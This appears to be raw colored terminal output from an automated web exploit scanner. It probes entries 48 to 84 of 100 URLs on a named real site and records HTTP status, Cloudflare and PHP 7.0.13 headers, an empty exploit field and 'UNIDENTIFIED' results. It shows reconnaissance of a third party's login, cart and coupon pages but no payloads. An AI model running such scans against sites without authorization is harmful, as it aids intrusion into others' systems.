[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 48 / 100 [1;37m][0;37m-[05:19:11][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-photos/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 49 / 100 [1;37m][0;37m-[05:19:12][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-videos/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 50 / 100 [1;37m][0;37m-[05:19:13][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/login/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 51 / 100 [1;37m][0;37m-[05:19:13][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/cart/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 52 / 100 [1;37m][0;37m-[05:19:15][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/contact/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 53 / 100 [1;37m][0;37m-[05:19:16][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/register/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 54 / 100 [1;37m][0;37m-[05:19:16][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/selected-package/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 55 / 100 [1;37m][0;37m-[05:19:17][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/health/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 56 / 100 [1;37m][0;37m-[05:19:19][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/logbook/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 57 / 100 [1;37m][0;37m-[05:19:19][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×š××©××-×× ××××××š/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 58 / 100 [1;37m][0;37m-[05:19:20][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 59 / 100 [1;37m][0;37m-[05:19:21][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/test-popup/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 60 / 100 [1;37m][0;37m-[05:19:21][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/personal_details_coupon/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare  , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 61 / 100 [1;37m][0;37m-[05:19:22][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/×©×××š××-2/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 62 / 100 [1;37m][0;37m-[05:19:23][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×©×××š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 63 / 100 [1;37m][0;37m-[05:19:25][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/unsubsribe/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 64 / 100 [1;37m][0;37m-[05:19:26][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/custom-packages/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 65 / 100 [1;37m][0;37m-[05:19:26][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-press/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 66 / 100 [1;37m][0;37m-[05:19:27][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/forgot/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 67 / 100 [1;37m][0;37m-[05:19:28][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/category/news/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 68 / 100 [1;37m][0;37m-[05:19:28][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/choose-package/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 69 / 100 [1;37m][0;37m-[05:19:29][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/blackfriday/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 404 Not Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 70 / 100 [1;37m][0;37m-[05:19:29][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/contact-test/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 71 / 100 [1;37m][0;37m-[05:19:30][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××-×××-×× ××š×ª-×š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 72 / 100 [1;37m][0;37m-[05:19:32][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/upsells/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 73 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/12/04/×××š×§×Š××-×××š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 74 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/applied-coupon/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 75 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/11/25/×××š×§×Š××-×××-×××©×€××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 76 / 100 [1;37m][0;37m-[05:19:34][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/12/12/×××š×§×Š×××ª-×××š-××Š×××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 77 / 100 [1;37m][0;37m-[05:19:35][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/2016/12/04/×××š×§×Š××-×××š××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 78 / 100 [1;37m][0;37m-[05:19:35][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/test-popup/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare  , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 79 / 100 [1;37m][0;37m-[05:19:36][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××-×××××©/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 80 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-photos/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 81 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××××××-××¢××£-×©××/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 82 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/apply-gift-voucher/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 83 / 100 [1;37m][0;37m-[05:19:38][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-videos/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 84 / 100 [1;37m][0;37m-[05:19:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/×©×××š××-2/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare  X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
